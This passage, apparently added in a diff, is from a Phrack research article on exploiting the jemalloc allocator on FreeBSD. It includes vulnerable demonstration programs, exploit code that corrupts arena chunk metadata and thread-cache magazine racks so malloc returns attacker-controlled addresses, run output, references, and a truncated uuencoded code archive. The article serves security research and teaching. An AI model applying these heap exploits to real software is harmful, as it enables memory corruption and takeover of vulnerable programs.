+2) Overwrite the 'arena' pointer of arena B's chunk and make it point
+to an already existing arena. The address of the very first arena of
+a process (call it arena A) is always fixed since it's declared as
+static. This will prevent the allocator from accessing a bad address
+and eventually segfaulting.
+
+3) Force or let the target application free() any chunk that belongs to
+arena B. We can deallocate any number of pages as long as they are marked
+as allocated in the jemalloc metadata. Trying to free an unallocated page
+will result in the red-black tree implementation of jemalloc entering
+an endless loop or, rarely, segfaulting.
+
+4) The next allocation to be served by arena B, will return a pointer
+somewhere within the region that was erroneously free()'ed in step 3.
+
+The exploit code for the vulnerable program presented in this section
+can be seen below. It was coded on an x86 FreeBSD-8.2-RELEASE system, so
+the offsets of the metadata may vary for your platform. Given the address
+of an existing arena (arena A of step 2), it creates a file that contains
+the exploitation vector. This file should be passed as argument to the
+vulnerable target (full code in file exploit-chunk.c):
+
+
+char buffer[1024], *p;
+int fd;
+
+if(argc != 2) {
+    fprintf(stderr, "%s <arena>\n", argv[0]);
+    return 0;
+}
+
+memset(buffer, 0, sizeof(buffer));
+
+p = buffer;
+strncpy(p, "1234567890123456", 16);
+p += 16;
+
+/* Arena address. */
+*(size_t *)p = (size_t)strtoul(argv[1], NULL, 16);
+p += sizeof(size_t);
+
+/* Skip over rbtree metadata and 'chunk->map[0]'. */
+strncpy(p,
+    "AAAA" "AAAA" "CCCC"
+    "AAAA" "AAAA" "AAAA" "GGGG" "HHHH" , 32);
+
+p += 32;
+
+*(size_t *)p = 0x00001002;
+/*                      ^ CHUNK_MAP_LARGE                 */
+/*                   ^ Number of pages to free (1 is ok). */
+p += sizeof(size_t);
+
+fd = open("exploit2.v", O_WRONLY | O_TRUNC | O_CREAT, 0700);
+write(fd, buffer, (p - (char *)buffer));
+close(fd);
+return 0;
+
+
+It is now time for some action. First, let's compile and run the vulnerable
+code.
+
+
+$ ./vuln-chunk
+# Chunk 0x28200000 belongs to arena 0x8049d98
+# Chunk 0x28300000 belongs to arena 0x8049d98
+...
+# Region at 0x28301030
+00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
+p3 = 0x28302000
+# Region at 0x28301030
+00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
+
+
+The output is what one expects it to be. First, the vulnerable code forces
+the allocator to initialize a new chunk (0x28300000) and then requests
+a memory region which is given the address 0x28301030. The next call to
+'malloc()' returns 0x28302000. So far so good. Let's feed our target
+with the exploitation vector and see what happens.
+
+$ ./exploit-chunk 0x8049d98
+$ ./vuln-chunk exploit2.v
+# Chunk 0x28200000 belongs to arena 0x8049d98
+# Chunk 0x28300000 belongs to arena 0x8049d98
+...
+Read 56 bytes
+# Region at 0x28301030
+00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
+p3 = 0x28301000
+# Region at 0x28301030
+41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41         AAAAAAAAAAAAAAAA
+
+
+As you can see the second call to 'malloc()' returns a new region
+'p3 = 0x28301000' which lies 0x30 bytes before 'first' (0x28301030)!
+
+Okay, so you're now probably thinking if this technique is useful. Please
+note that the demonstration code presented in the previous two sections
+was carefully coded to prepare the heap in a way that is convenient for
+the attacker. It is for this purpose that these attacks may seem obscure
+at first. On the contrary, in real life applications, heap overflows in
+jemalloc will result in one of the following three cases:
+
+1) Overwrite of an adjacent memory region.
+
+2) Overwrite of the run metadata (in case the overflown region is the
+last in a run).
+
+3) Overwrite of the arena chunk metadata (in case the overflown region
+is the last in a chunk).
+
+That said we believe we have covered most of the cases that an attacker
+may encounter. Feel free to contact us if you think we have missed
+something important.
+
+
+------[ 3.3.3 - Thread caches (tcache_t)
+
+As we have analyzed in 2.1.7, thread cache magazine 'rounds' and other
+magazine metadata are placed in normal memory regions. Assuming a 'mag_t'
+along with its void pointer array has a total size of N, one can easily
+acquire a memory region in the same run by calling 'malloc(N)'.
+
+Overflowing a memory region adjacent to a 'mag_t' can result in 'malloc()'
+returning arbitrary attacker controlled addresses. It's just a matter of
+overwriting 'nrounds' and the contents of the void pointer array to
+contain a stack address (or any other address of interest). A careful
+reader of section 2.1.7 would have probably noticed that the same result
+can be achieved by giving 'nrounds' a sufficiently large value in order to
+pivot in the stack (or any user controlled memory region). This scenario is
+pretty straightforward to exploit, so, we will have a look at the case of
+overwriting a 'mag_rack_t' instead (it's not that sophisticated either).
+
+Magazine racks are allocated by 'mag_rack_alloc()':
+
+
+mag_rack_t *
+mag_rack_create(arena_t *arena)
+{
+    ...
+    return (arena_malloc_small(arena, sizeof(mag_rack_t) +
+        (sizeof(bin_mags_t) * (nbins - 1)), true));
+}
+
+
+Now, let's calculate the size of a magazine rack:
+
+
+(gdb) print nbins
+$6 = 30
+(gdb) print sizeof(mag_rack_t) + (sizeof(bin_mags_t) * (nbins - 1))
+$24 = 240
+
+
+A size of 240 is actually serviced by the bin holding regions of 256 bytes.
+Issuing calls to 'malloc(256)' will eventually end up in a user controlled
+region physically bordering a 'mag_rack_t'. The following vulnerable code
+emulates this situation (file vuln-mag.c):
+
+
+/* The 'vulnerable' thread. */
+void *vuln_thread_runner(void *arg) {
+  char *v;
+
+  v = (char *)malloc(256);  /* [3-25] */
+  printf("[vuln] v = %p\n", v);
+  sleep(2);
+
+  if(arg)
+    strcpy(v, (char *)arg);
+  return NULL;
+}
+
+/* Other threads performing allocations. */
+void *thread_runner(void *arg) {
+  size_t self = (size_t)pthread_self();
+  char *p1, *p2;
+
+  /* Allocation performed before the magazine rack is overflown. */
+  p1 = (char *)malloc(16);
+  printf("[%u] p1 = %p\n", self, p1);
+  sleep(4);
+
+  /* Allocation performed after overflowing the rack. */
+  p2 = (char *)malloc(16);
+  printf("[%u] p2 = %p\n", self, p2);
+  sleep(4);
+  return NULL;
+}
+
+int main(int argc, char *argv[]) {
+  size_t tcount, i;
+  pthread_t *tid, vid;
+
+  if(argc != 3) {
+    printf("%s <thread_count> <buff>\n", argv[0]);
+    return 0;
+  }
+
+  /* The fake 'mag_t' structure will be placed here. */
+  printf("[*] %p\n", getenv("FAKE_MAG_T"));
+
+  tcount = atoi(argv[1]);
+  tid = (pthread_t *)alloca(tcount * sizeof(pthread_t));
+
+  pthread_create(&vid, NULL, vuln_thread_runner, argv[2]);
+  for(i = 0; i < tcount; i++)
+    pthread_create(&tid[i], NULL, thread_runner, NULL);
+
+  pthread_join(vid, NULL);
+  for(i = 0; i < tcount; i++)
+    pthread_join(tid[i], NULL);
+
+  pthread_exit(NULL);
+}
+
+
+The vulnerable code spawns a, so called, vulnerable thread that performs an
+allocation of 256 bytes. A user supplied buffer, 'argv[2]' is copied in it
+thus causing a heap overflow. A set of victim threads are then created. For
+demonstration purposes, victim threads have a very limited lifetime, their
+main purpose is to force jemalloc initialize new 'mag_rack_t' structures.
+As the comments indicate, the allocations stored in 'p1' variables take
+place before the magazine rack is overflown while the ones stored in 'p2'
+will get affected by the fake magazine rack (in fact, only one of them
+will; the one serviced by the overflown rack). The allocations performed
+by victim threads are serviced by the newly initialized magazine racks.
+Since each magazine rack spans 256 bytes, it is highly possible that the
+overflown region allocated by the vulnerable thread will lie somewhere
+around one of them (this requires that both the target magazine rack and
+the overflown region will be serviced by the same arena).
+
+Once the attacker is able to corrupt a magazine rack, exploitation is just
+a matter of overwriting the appropriate 'bin_mags' entry. The entry should
+be corrupted in such a way that 'curmag' should point to a fake 'mag_t'
+structure. The attacker can choose to either use a large 'nrounds' value to
+pivot into the stack, or give arbitrary addresses as members of the void
+pointer array, preferably the latter. The exploitation code given below
+makes use of the void pointer technique (file exploit-mag.c):
+
+
+int main(int argc, char *argv[]) {
+  char fake_mag_t[12 + 1];
+  char buff[1024 + 1];
+  size_t i, fake_mag_t_p;
+
+  if(argc != 2) {
+    printf("%s <mag_t address>\n", argv[0]);
+    return 1;
+  }
+  fake_mag_t_p = (size_t)strtoul(argv[1], NULL, 16);
+
+  /* Please read this...
+   *
+   * In order to void using NULL bytes, we use 0xffffffff as the value
+   * for 'nrounds'. This will force jemalloc picking up 0x42424242 as
+   * a valid region pointer instead of 0x41414141 :)
+   */
+  printf("[*] Assuming fake mag_t is at %p\n", (void *)fake_mag_t_p);
+  *(size_t *)&fake_mag_t[0] = 0x42424242;
+  *(size_t *)&fake_mag_t[4] = 0xffffffff;
+  *(size_t *)&fake_mag_t[8] = 0x41414141;
+  fake_mag_t[12] = 0;
+  setenv("FAKE_MAG_T", fake_mag_t, 1);
+
+  /* The buffer that will overwrite the victim 'mag_rack_t'. */
+  printf("[*] Preparing input buffer\n");
+  for(i = 0; i < 256; i++)
+    *(size_t *)&buff[4 * i] = (size_t)fake_mag_t_p;
+  buff[1024] = 0;
+
+  printf("[*] Executing the vulnerable program\n");
+  execl("./vuln-mag", "./vuln-mag", "16", buff, NULL);
+  perror("execl");
+  return 0;
+}
+
+
+Let's compile and run the exploit code:
+
+
+$ ./exploit-mag
+./exploit-mag <mag_t address>
+$ ./exploit-mag 0xdeadbeef
+[*] Assuming fake mag_t is at 0xdeadbeef
+[*] Preparing input buffer
+[*] Executing the vulnerable program
+[*] 0xbfbfedd6
+...
+
+
+The vulnerable code reports that the environment variable 'FAKE_MAG_T'
+containing our fake 'mag_t' structure is exported at 0xbfbfedd6.
+
+
+$ ./exploit-mag 0xbfbfedd6
+[*] Assuming fake mag_t is at 0xbfbfedd6
+[*] Preparing input buffer
+[*] Executing the vulnerable program
+[*] 0xbfbfedd6
+[vuln] v = 0x28311100
+[673283456] p1 = 0x28317800
+...
+[673283456] p2 = 0x42424242
+[673282496] p2 = 0x3d545f47
+
+
+Neat. One of the victim threads, the one whose magazine rack is overflown,
+returns an arbitrary address as a valid region. Overwriting the thread
+caches is probably the most lethal attack but it suffers from a limitation
+which we do not consider serious. The fact that the returned memory region
+and the 'bin_mags[]' element both receive arbitrary addresses, results in a
+segfault either on the deallocation of 'p2' or once the thread dies by
+explicitly or implicitly calling 'pthread_exit()'. Possible shellcodes
+should be triggered _before_ the thread exits or the memory region is
+freed. Fair enough... :)
+
+
+--[ 4 - A real vulnerability
+
+For a detailed case study on jemalloc heap overflows see the second Art of
+Exploitation paper in this issue of Phrack.
+
+
+--[ 5 - Future work
+
+This paper is the first public treatment of jemalloc that we are aware
+of. In the near future, we are planning to research how one can corrupt
+the various red black trees used by jemalloc for housekeeping. The rbtree
+implementation (defined in rb.h) is fully based on preprocessor macros
+and it's quite complex in nature. Although we have already debugged them,
+due to lack of time we didn't attempt to exploit the various tree
+operations performed on rbtrees. We wish that someone will continue our
+work from where we left of. If no one does, then you definitely know whose
+articles you'll soon be reading :)
+
+
+--[ 6 - Conclusion
+
+We have done the first step in analyzing jemalloc. We do know, however,
+that we have not covered every possible potential of corrupting the
+allocator in a controllable way. We hope to have helped those that were
+about to study the FreeBSD userspace allocator or the internals of Firefox
+but wanted to have a first insight before doing so. Any reader that
+discovers mistakes in our article is advised to contact us as soon as
+possible and let us know.
+
+Many thanks to the Phrack staff for their comments. Also, thanks to George
+Argyros for reviewing this work and making insightful suggestions.
+
+Finally, we would like to express our respect to Jason Evans for such a
+leet allocator. No, that isn't ironic; jemalloc is, in our opinion, one of
+the best (if not the best) allocators out there.
+
+
+--[ 7 - References
+
+[JESA]  Standalone jemalloc
+        - http://www.canonware.com/cgi-bin/gitweb.cgi?p=jemalloc.git
+
+[JEMF]  Mozilla Firefox jemalloc
+        - http://hg.mozilla.org/mozilla-central/file/tip/memory/jemalloc
+
+[JEFB]  FreeBSD 8.2-RELEASE-i386 jemalloc
+        - http://www.freebsd.org/cgi/cvsweb.cgi/src/lib/libc/stdlib/
+            malloc.c?rev=1.183.2.5.4.1;content-type=text%2Fplain;
+            only_with_tag=RELENG_8_2_0_RELEASE
+
+[JELX]  Linux port of the FreeBSD jemalloc
+        - http://www.canonware.com/download/jemalloc/
+            jemalloc_linux_20080828a.tbz
+
+[JE06]  Jason Evans, A Scalable Concurrent malloc(3) Implementation for
+            FreeBSD
+        - http://people.freebsd.org/~jasone/jemalloc/bsdcan2006
+            /jemalloc.pdf
+
+[PV10]  Peter Vreugdenhil, Pwn2Own 2010 Windows 7 Internet Explorer 8
+            exploit
+        - http://vreugdenhilresearch.nl
+            /Pwn2Own-2010-Windows7-InternetExplorer8.pdf
+
+[FENG]  Alexander Sotirov, Heap Feng Shui in Javascript
+        - http://www.phreedom.org/research/heap-feng-shui/
+            heap-feng-shui.html
+
+[HOEJ]  Mark Daniel, Jake Honoroff, Charlie Miller, Engineering Heap
+            Overflow Exploits with Javascript
+        - http://securityevaluators.com/files/papers/isewoot08.pdf
+
+[CVRS]  Chris Valasek, Ryan Smith, Exploitation in the Modern Era
+            (Blueprint)
+        - https://www.blackhat.com/html/bh-eu-11/
+            bh-eu-11-briefings.html#Valasek
+
+[VPTR]  rix, Smashing C++ VPTRs
+        - http://www.phrack.org/issues.html?issue=56&id=8
+
+[HAPF]  huku, argp, Patras Heap Massacre
+        - http://fosscomm.ceid.upatras.gr/
+
+[APHN]  argp, FreeBSD Kernel Massacre
+        - http://ph-neutral.darklab.org/previous/0x7db/talks.html
+
+[UJEM]  unmask_jemalloc
+        - https://github.com/argp/unmask_jemalloc
+
+
+--[ 8 - Code
+
+begin 644 code.tar.gz
+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
